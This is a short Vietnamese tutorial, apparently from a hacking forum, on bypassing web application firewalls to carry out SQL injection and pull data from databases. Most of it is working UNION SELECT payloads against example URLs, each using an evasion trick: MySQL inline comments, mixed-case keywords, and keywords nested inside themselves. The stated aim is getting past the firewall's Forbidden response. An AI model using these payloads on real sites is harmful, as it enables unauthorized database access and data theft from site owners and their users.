Trước khi đi vào tìm hiểu cách bypass thì ta sẽ đi tìm hiểu xem WAF là gì.
WAF là viết tắt của Web Application Firewall, Admin sử dụng Web Application Firewall nhằm để ngăn chặn các cuộc tấn công như SQLi và XSS. WAF phát hiện các cuộc tấn công nguy hiểm với việc sử dụng các bộ lọc dựa trên chữ ký và định nghĩa trong một danh sách các quy tắc.
Cách thức hoạt động
Khi WAF dò tìm được Malicous thử tất công vào thì nó sẽ đưa ra URL với lỗi là Forbidden.
Mục đích của chúng ta là để bỏ qua lỗi này và cần phải lấy dữ liệu từ cơ sở dữ liệu bằng cách sử dụng một số kỹ thuật đặc biệt. Có rất nhiều phương pháp để Bypass WAF. Trong hướng dẫn này, tôi sẽ chỉ cho bạn một số phương pháp cơ bản. Những phương pháp này đặc biệt có ích là cho người mới bắt đầu.
Phương pháp để Bypass WAF
Sử dụng Comments:-
Comment cho phép Bypass qua rất nhiều hạn chế Web application firewalls để thực hiện các lệnh tấn công trong khi đưa ra các truy vấn hợp pháp.
Query thông thường
Code:
http://example.com/detail.php?id=44 union all select 1,2,3,4,5—
Bypass WAF
Code:
http://example.com/detailphp?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5—
Sử dụng chữ viết hoa của các hàm:
Thỉnh thoảng, cần phải Bypass bằng cách viết hoa một số ký tự các hàm
Query thông thường.
Code:
http://example.com/detail.php?id=44 UNION SELECT 1,2,3,4,5—
Code:
http://example.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5—
Đôi khi lại cần phải thay thế từ khoá như UNION, SELECT, ORDER BY
Query thông thường
Code:
http://example.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5—
Code:
http://example.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--
.